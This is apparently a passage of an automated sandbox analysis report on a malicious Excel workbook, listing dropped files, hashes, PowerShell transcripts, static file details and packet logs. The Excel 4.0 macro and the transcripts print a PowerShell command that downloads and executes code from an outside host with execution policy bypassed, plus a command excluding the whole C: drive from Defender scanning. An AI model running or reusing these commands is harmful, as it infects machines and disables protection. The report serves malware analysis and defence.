                                                                                                                                                                                                    SHA-256:D083995CBEF39E2EFD8662A99954A3FF207C2DC7075F19F90A852BA17CDDADEE
                                                                                                                                                                                                    SHA-512:2897CB6EF6ADD3200A7141A55E428D3D10B4E9088C7CA8BA1B85D521AD32CCF74AA69803FAF7EFC723B1A9E8130BEA8F07982EB0B071BFD1F06EB1AED3147BD6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: L..................F.... ...X..S.....OK......OK..................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..(R@D....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N..(R@D....#J....................$._.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N..(R@D.....Y..............>......w&.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....(RHD .TELEX0~1.XLS..T......>Q{<(RHD.....V......................C.T.e.l.e.x.0.6.0.1.2.0.2.0...x.l.s.......W...............-.......V...........>.S......C:\Users\user\Desktop\Telex06012020.xls..(.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.e.l.e.x.0.6.0.1.2.0.2.0...x.l.s.........:..,.LB.)...As...`.......X.......179605...........!a..%.H.VZAj...{................!a..%.H.VZAj...{...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2....
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):92
                                                                                                                                                                                                    Entropy (8bit):4.1711745601340615
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:oyBVomMHZOVX/6lphZOVX/6lmMHZOVX/6lv:dj6M9S7W9SxM9S1
                                                                                                                                                                                                    MD5:0A818CE42B82E28C18F24F1461724805
                                                                                                                                                                                                    SHA1:A8825698DD788B8C2236FF6BEFB7235D0938A1ED
                                                                                                                                                                                                    SHA-256:D29555390CEE036E08F72AB94C450ADFAF4244F6318837DB856DA042C607EE07
                                                                                                                                                                                                    SHA-512:4824E4170BC4DC4022AB1ABDE52BC3ADC2F0DD3A95756CEAA115CFA04805489B2FCBED0DC14D8C339E73424450BCAB2A3ED5E4D11E97DB1CF4A1C55EF66BBDF0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: Desktop.LNK=0..[xls]..Telex06012020.LNK=0..Telex06012020.LNK=0..[xls]..Telex06012020.LNK=0..
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):22
                                                                                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\sztmmjA.tmp
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Test3.jpg
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                    Entropy (8bit):0.792852251086831
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\Desktop\DCC40000
                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):137610
                                                                                                                                                                                                    Entropy (8bit):7.509226913581185
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:o4xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAGHwSJtUkUlR/FoeHxv7nalHDCfZoCF0:BxEtjPOtioVjDGUU1qfDlavx+W2QnAyp
                                                                                                                                                                                                    MD5:CE5E8C9996E3AB34AC28489F2A3C8C55
                                                                                                                                                                                                    SHA1:147F9B4BFA526ACE9F31E5A8E509A4771AEEB7D8
                                                                                                                                                                                                    SHA-256:24D474665891192B3D310E2AD4AAF1484EE7FE764478C9FA5E2A475F07D26AF1
                                                                                                                                                                                                    SHA-512:6F913C3CEF7298186CAE737B9516848CBD7B27B176F2BDAC9B02F41B2B6D7BD4CE1FF74E05B44516484FF3D351D0DD6038262B40504D1EACA94DE14D63D08D29
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\Desktop\DCC40000, Author: Florian Roth
                                                                                                                                                                                                    Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....<.WN..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.........."$"
                                                                                                                                                                                                    C:\Users\user\Documents\20210108\PowerShell_transcript.179605.1KVzgujm.20210108093427.txt
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1285
                                                                                                                                                                                                    Entropy (8bit):5.303199615941223
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:BxSAXm7vBZuzx2DOXC0fD/jLW7HjeTKKjX4CIym1ZJX/IJD/j1fvfuKs8MXiV+Ps:BZ8vjeoOVq7qDYB1Z0t3ZW2+rgZoZZdC
                                                                                                                                                                                                    MD5:10DB2489170F4AD7B069CF5E861DD6B6
                                                                                                                                                                                                    SHA1:84015D396BAB988BC4F2E41C7F6480E75FC90217
                                                                                                                                                                                                    SHA-256:D8AC486E4558FBAA4DE42E516D31FBE7F80F5C2716E3829E1196CA366434D1DE
                                                                                                                                                                                                    SHA-512:BD20F1BBE293CD2202290C2587B65EC22BAA481A0B5C88B9D23CB3CE3F962DC25142B67486D313EEFA95E9765569385A0093268AA5FFF60C5D2178B75945E012
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210108093440..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))..Process ID: 5848..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210108093440..**********************..PS>iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))..False..C:\Users\user\AppData\Local\Temp\Test1.txt..C:\Users\user\AppData\Local\Temp\Test2.gif.. 1 file(s) copied...Executing (Win32_Process)->Create()..Method execution successful...Out Parameters:..instance of __
                                                                                                                                                                                                    C:\Users\user\Documents\20210108\PowerShell_transcript.179605.XuKY+ytb.20210108093520.txt
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5048
                                                                                                                                                                                                    Entropy (8bit):5.386219134914956
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:BZDjeN5sqDo1ZIZJjeN5sqDo1ZPM6UjZDjeN5sqDo1ZpFEEGZR:2y65
                                                                                                                                                                                                    MD5:B418FE0C9462B2B60E822C15FF7CA680
                                                                                                                                                                                                    SHA1:4B9F928A980EB8843454A1CD233D055034014EE5
                                                                                                                                                                                                    SHA-256:3667AC287C119EE21B3D6C58B1D2E7C864E92B95413C8721D33255AB185219B7
                                                                                                                                                                                                    SHA-512:2EFEC64E148C2FA558DD51B73A6D40CF514C0F48870493922CF6F8A97E43B33E0F48CC56D33A0B7D36BCD7239ED146567C97EDA848C3EB3F4B7075DC870A49A6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210108093537..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 5368..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210108093537..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20210108093841..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus
                                                                                                                                                                                                    \Device\ConDrv
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):160
                                                                                                                                                                                                    Entropy (8bit):5.095703110114614
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgkSH0wFJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egkSH0qE
                                                                                                                                                                                                    MD5:DDDE552835D6965F874AE689CF0790A6
                                                                                                                                                                                                    SHA1:FD84334F01C4A23F1E8E8A1E273EDB20D0F227BA
                                                                                                                                                                                                    SHA-256:B21EF0761891F98BA637444A9390F8048920081EC4848B8EC88229E9B85BE387
                                                                                                                                                                                                    SHA-512:F6864733F63CBDC50B1435CACA0DAAED1F4AB9F1806147B3E4BB59BA421B056B022D7C08E2FF0B8543E1C016D82A595CCAA0255466ABD93EA0A9F1114CE2FDEF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6852;...ReturnValue = 0;..};....

                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: OBA, Last Saved By: OBA, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 6 16:14:54 2021, Last Saved Time/Date: Wed Jan 6 16:18:07 2021, Security: 0
                                                                                                                                                                                                    Entropy (8bit):7.63969342616772
                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                    • Microsoft Excel sheet (30009/1) 45.83%
                                                                                                                                                                                                    • Microsoft Works Spreadsheet (27457/6) 41.94%
                                                                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.23%
                                                                                                                                                                                                    File name:Telex06012020.xls
                                                                                                                                                                                                    File size:122880
                                                                                                                                                                                                    MD5:c221348cc4be1ca5c8d1fe510c672e57
                                                                                                                                                                                                    SHA1:b7bbcb23c92782d871a684afc34e4c8264e96b8e
                                                                                                                                                                                                    SHA256:07a877cc1499b20ae7bcaf0200f2576a100754fa661e391f36cbb95aa58a75b9
                                                                                                                                                                                                    SHA512:6cd55b442d3513b6377b595f5a05b7914133ff4c0630b57579f6927a8366e1117086d5cd00d07c3fd3ec9a9b0d9472900ac3638200d92a8222072dc40d793d84
                                                                                                                                                                                                    SSDEEP:3072:dfZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAfHgSJtM2slx/FQeHxvjnqlHDCfVoCF:RZ+RwPONXoRjDhIcp0fDlavx+W26nAve
                                                                                                                                                                                                    File Content Preview:........................>.......................................................b..............................................................................................................................................................................

                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                    Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                                    Static OLE Info

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Document Type:OLE
                                                                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                                                                    OLE File "Telex06012020.xls"

                                                                                                                                                                                                    Indicators

                                                                                                                                                                                                    Has Summary Info:True
                                                                                                                                                                                                    Application Name:Microsoft Excel
                                                                                                                                                                                                    Encrypted Document:False
                                                                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                                                                    Flash Objects Count:
                                                                                                                                                                                                    Contains VBA Macros:True

                                                                                                                                                                                                    Summary

                                                                                                                                                                                                    Code Page:1252
                                                                                                                                                                                                    Author:OBA
                                                                                                                                                                                                    Last Saved By:OBA
                                                                                                                                                                                                    Create Time:2021-01-06 16:14:54
                                                                                                                                                                                                    Last Saved Time:2021-01-06 16:18:07
                                                                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                                                                    Security:0

                                                                                                                                                                                                    Document Summary

                                                                                                                                                                                                    Document Code Page:1252
                                                                                                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                                                                                                    Contains Dirty Links:False
                                                                                                                                                                                                    Shared Document:False
                                                                                                                                                                                                    Changed Hyperlinks:False
                                                                                                                                                                                                    Application Version:786432

                                                                                                                                                                                                    Streams

                                                                                                                                                                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x1CompObj
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:114
                                                                                                                                                                                                    Entropy:4.25248375193
                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 288
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:288
                                                                                                                                                                                                    Entropy:3.22237115402
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Stream Size:200
                                                                                                                                                                                                    Entropy:3.44023669415
                                                                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O B A . . . . . . . . . O B A . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . S j . G . . . @ . . . . . s . G . . . . . . . . . . .
                                                                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 118310
                                                                                                                                                                                                    General
                                                                                                                                                                                                    Stream Path:Workbook
                                                                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                                    Stream Size:118310
                                                                                                                                                                                                    Entropy:7.74604422094
                                                                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . O B A B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . < . W N . . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                                                                                                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 4f 42 41 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                                                                    "=                            cItARKOyQs0SudK                         &            t1Bg8ysdvhEcSX0v9DVkRr1spwdW3kKqnK3                          &EXEC(""CmD.Exe  /C poWeRSheLL.EXe  -ex BYPAsS -NoP -w 1 iEx( curL  ('http://lankarecipes.com/mages.jp'  + 'g' ))"")"=  HALT()

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.061940908 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.245029926 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.245177984 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.247750044 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.430522919 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435033083 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435076952 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435107946 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435142994 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435174942 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435205936 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435247898 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435256958 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435280085 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435300112 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435302019 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435323000 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435333014 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.435386896 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618185997 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618215084 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618227959 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618243933 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618259907 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618279934 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618297100 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618313074 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618328094 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618344069 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618352890 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618360043 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618376970 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618391991 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618408918 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618411064 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618427992 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618443966 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618451118 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618459940 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618475914 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618478060 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618490934 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618506908 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618514061 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618535995 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.618585110 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.801896095 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.801940918 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.801960945 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.802042961 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803514957 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803539991 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803558111 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803575039 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803591013 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803597927 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803606033 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803622007 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803637981 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803648949 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803653955 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803673029 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803685904 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803697109 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803706884 CET4972880192.168.2.4192.185.236.165
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803709984 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803723097 CET8049728192.185.236.165192.168.2.4
                                                                                                                                                                                                    Jan 8, 2021 09:34:53.803735018 CET8049728192.185.236.165192.168.2.4
